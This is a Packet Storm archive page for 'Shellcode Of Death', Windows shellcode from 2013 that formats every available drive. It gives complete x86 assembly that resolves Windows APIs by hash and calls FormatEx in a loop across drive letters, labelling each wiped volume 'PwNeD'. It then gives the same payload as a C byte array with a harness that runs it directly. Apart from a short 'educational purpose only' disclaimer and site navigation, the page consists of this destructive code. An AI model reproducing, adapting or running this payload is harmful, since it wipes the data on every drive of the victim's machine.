what you don't know can hurt you

Shellcode Of Death

Shellcode Of Death
Posted Apr 9, 2013
Authored by Ashfaq Ansari, Ruei-Min Jiang

This shellcode has been designed to format all the available drives on Windows.

tags | shellcode
systems | windows
MD5 | e75c2fb2b63b997f58e082060fa5d65b

Shellcode Of Death

Change Mirror Download
ShellcodeOfDeath has been designed to format all the available drive on Windows.

Disclaimer: This shellcode is developed for educational purpose only. The author
is not and will not hold any responsibility for any illegal or unauthorized use
of #ShellcodeOfDeath. Any use of this shellcode is at the reader’s own risk.

Home Page: http://hacksys.vfreaks.com/

Post Link: http://hacksys.vfreaks.com/research/shellcode-of-death.html

You may download Shellcode Of Death archive from the above link.


======================================================================
Start Of Code - ShellcodeOfDeath.s
======================================================================

/*
* _ __ _____
* /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
* / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
* / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
* \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
* |___/
* http://hacksys.vfreaks.com/
* hacksysteam@hotmail.com
*
* Shellcode Of Death
* v1.0
*
* Ruei-Min Jiang (@mike820324) a.k.a MicroMike
* Ashfaq Ansari (ashfaq_ansari1989@hotmail.com)
*
* Still a lot can be done to improve this shellcode. This is the first release.
* Further, a lot of improvement and optimization can be done to this shellcode.
* Any bugs, suggestions or contribution is most welcomed.
*
* Lenth of shellcode: 387 bytes
* Number of NULL byte: 49
*
* Notes: There are more NULL bytes due to a fact that few of the Windows API used
* accepts input in UNICODE format. Still, NULL bytes can be reduces further.
* We can use any simple encoder to xor encode the shellcode and eventually
* eliminate NULL bytes.
*
* Things to do:
* 1. Code cleanup
* 2. Optimization
* 3. Minification
* 4. Add suggestions
*/
.globl _main

_main:
jmp start_shell;
/*
* %edx store the base address of kernel32.dll (input)
* %ebx points to the start of symbal name table (input)
* %ecx contains the destination hash value (input)
* %eax is the index_counter (output)
*/
hash_function:
xorl %eax,%eax;
next_entry:
mov (%ebx,%eax,4), %esi;
addl %edx, %esi;
push %ebx;
push %eax;
xor %ebx, %ebx;
continue_hash:
xor %eax, %eax;
lodsb;
rol $5, %ebx;
addl %eax, %ebx;
cmp $0, %eax;
jnz continue_hash;
ror $5, %ebx;
cmp %ecx, %ebx;
pop %eax;
pop %ebx;
je hash_finish;
inc %eax;
jmp next_entry;
hash_finish:
ret;

/*
* input:
* set %edx to the dll base address
* set %ecx as the hash value you want to compare
* output:
* %eax is the API address
*/
get_address:
PE_init:
movl %edx, %eax;
movl 0x3c(%eax), %eax;
movl 0x78(%edx, %eax), %eax;
leal (%edx, %eax), %eax;
pushl %eax;
movl 0x20(%eax), %eax;
leal (%edx, %eax), %ebx;
call hash_function;

popl %ebx;
movl 0x24(%ebx), %ecx;
leal (%edx, %ecx), %ecx;
movw (%ecx, %eax, 2), %ax;
andl $0x0000ffff, %eax;

movl 0x1c(%ebx), %ebx;
leal (%edx, %ebx), %ebx;
movl (%ebx, %eax, 4), %eax;
leal (%edx, %eax), %eax;
ret;
/*
* hash value for each API
* LoadLibraryA = 0x331adddc
* CloseHandle = 0xd7629096
* CreateFileA = 0xcfb0e506
* ExitProcess = 0xec468f87
* Sleep = 0x567a110
* DeviceIOControl = 0x3b34d4a7
* --------------fmifs.dll---------------
* FormatEx = 0xab025b64
*/
start_shell:
set_Kernel32_env:
xorl %ecx, %ecx
movl %fs:0x30, %eax;
movl 0xc(%eax), %eax;
movl 0x1c(%eax), %eax;
next_module:
movl 0x8(%eax), %edx;
movl 0x20(%eax), %edi;
movl (%eax), %eax;
cmp 0x18(%edi), %cl;
jne next_module;

set_hash_table:
pushl $0xab025b64;
pushl $0x0567a110;
pushl $0x3b34d4a7;
pushl $0xd7629096;
pushl $0xec468f87;
pushl $0xcfb0e506;
pushl $0x331adddc;
movl %esp, %ebp;
end_hash_table:
set_api_table:
init_variable:
pushl $7;
popl %ecx;
xorl %edi, %edi;
loop_start:
cmp $1, %ecx;
jne set_kernel32_api;
set_fmifs_env:
pushl %ecx;
jmp data_string;
back_to_here:
restore_loadlibrary:
movl 0x1c(%esp), %eax;
call *%eax;
movl %eax, %edx;
popl %ecx;
set_kernel32_api:
pushl %ecx;
movl (%ebp, %edi, 4), %ecx;
call get_address;
popl %ecx;
pushl %eax;
inc %edi;
loop loop_start;
movl %esp, %ebp;
jmp start_main_code;
data_string:
call back_to_here;
.string "fmifs.dll";

start_main_code:
Get_string_addr:
jmp 2f;
1:;
popl %esi;
Format_start_loop:
pushl $23;
popl %ecx;
format_loop_start:
movl %ecx, %edi;

CreateFile_call:
xorl %edx, %edx;
pushl %edx;
pushl %edx;
pushl $3;
pushl %edx;
pushl $3;
pushl $0xc0000000;
pushl %esi;
movl 0x14(%ebp), %ebx;
call *%ebx;
Store_File_Handle:
pushl %eax;
subl $0x4, %esp;
xorl %edx, %edx;
DeviceIOControl_call:
pushl %edx;
leal 0x4(%esp), %ebx
pushl %ebx;
pushl %edx;
pushl %edx;
pushl %edx;
pushl %edx;
pushl $0x90020;
pushl %eax;
movl 0x8(%ebp), %ebx
call *%ebx;
close_file_handle:
pushl 0x4(%esp);
movl 0xc(%ebp), %ebx;
call *%ebx;

FormatEx_call:
leal call_back-string_start(%esi),%eax;
pushl %eax;
pushl $4096;
pushl $1;
leal volume_label-string_start(%esi), %eax;
pushl %eax;
leal string2_start-string_start(%esi), %eax;
pushl %eax;
pushl $0xc;
leal 0x8(%esi), %eax;
pushl %eax;
movl (%ebp), %ebx;
call *%ebx;
sleep_call:
pushl $200;
movl 0x4(%ebp), %ebx
call *%ebx;
loop_end:
movl %edi, %ecx
addl $1, 0x8(%esi);
loop format_loop_start;

exit_process:
push $0;
movl 0x10(%ebp), %ebx;
call *%ebx;
2:;
call 1b;
string_start:
.byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00
string2_start:
.byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00
/*
* Volume Label
* Set the name of the Volume label
* after formatting the respective volume.
* Modify volume_label as you desire.
* Deafult value -- PwNeD
*/
volume_label:
.byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00
call_back:
push %ebp;
movl %esp, %ebp;
xorl %eax, %eax;
inc %eax;
pop %ebp;
ret $0xc;

======================================================================
End Of Code - ShellcodeOfDeath.s
======================================================================


======================================================================
Testing Shellcode - ShellcodeTestUnEncoded.c
======================================================================

#include <stdio.h>
#include <string.h>

/*
_ __ _____
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
|___/

http://hacksys.vfreaks.com/
hacksysteam@hotmail.com

Module Name:

Shellcode Test Encoded

Abstract:

This program is used as a template to test
C style formatted shellcodes. A decoder is
already added to the final shellcode output.

IDE:

Dev-C++ 4.9.9.2 (Windows XP SP3)

Compiler:

gcc 3.4.2

*/

unsigned char shellcode[] =
"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50"
"\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83"
"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b"
"\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c"
"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20"
"\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b"
"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff"
"\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83"
"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00"
"\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b"
"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64"
"\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4"
"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46"
"\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33"
"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89"
"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff"
"\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8"
"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64"
"\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf"
"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00"
"\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83"
"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52"
"\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d"
"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff"
"\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10"
"\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50"
"\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46"
"\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00"
"\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8"
"\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c"
"\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00"
"\x54\x00\x46\x00\x53\x00\x00\x00"
// Volume Label. You may want to change this.
// Default: PwNeD
"\x50\x00\x77\x00\x4e\x00\x65\x00\x44\x00"
// Volume Label End
"\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00";


main()
{

int i, badchar_c = 0;

printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1);

for(i = 0; i < sizeof(shellcode)-1; ++i) {
if(((unsigned char *)shellcode)[i] == 0x00) {
badchar_c = badchar_c + 1;
}
}
printf("\nNumber of badchar: %d\n\n", badchar_c);

printf("\nPress any key to execute shellcode....\n\n");

getch();

int (*ret)() = (int(*)())shellcode;

ret();

}

======================================================================
End Testing Shellcode - ShellcodeTestUnEncoded.c
======================================================================

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close